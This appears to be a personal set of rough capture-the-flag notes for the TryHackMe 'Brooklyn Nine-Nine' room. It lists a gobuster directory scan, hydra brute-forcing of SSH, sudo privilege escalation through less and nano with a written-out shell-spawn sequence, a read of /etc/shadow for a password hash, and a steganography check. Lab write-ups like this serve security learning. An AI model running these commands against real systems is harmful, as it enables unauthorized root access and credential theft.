Skip to the content.

Rough Notes - Brooklyn Nine-Nine - TryHackMe CTF

Webpage

Back to Table of Contents

Steg

NMAP -ssh,ftp

gobuster gobuster -u 10.10.153.36 -w /home/aes18/Documents/CS/Tools/Kali/dirbuster/wordlists/directory-list-1.0.txt -x php,js,py,html,exe,zip,jpg,png,conf,db

hydra

foothold on SSH

sudo -l --> usr/bin/less /usr/bin/less /root/root.txt --> flag

cd /home cd jake cd holt --> flag

su holt --> password from before

sudo -l /usr/bin/nano

GTFOBins --> nano --> root sudo nano ^R^X reset; sh 1>&0 2>&0

cat /etc/shadow --> amy hash

cd /var/www/html --> see photo.jpg python3 -m http.server --> download photo.jpg stegseek --> "Stillnoob was here" -- rabbit hole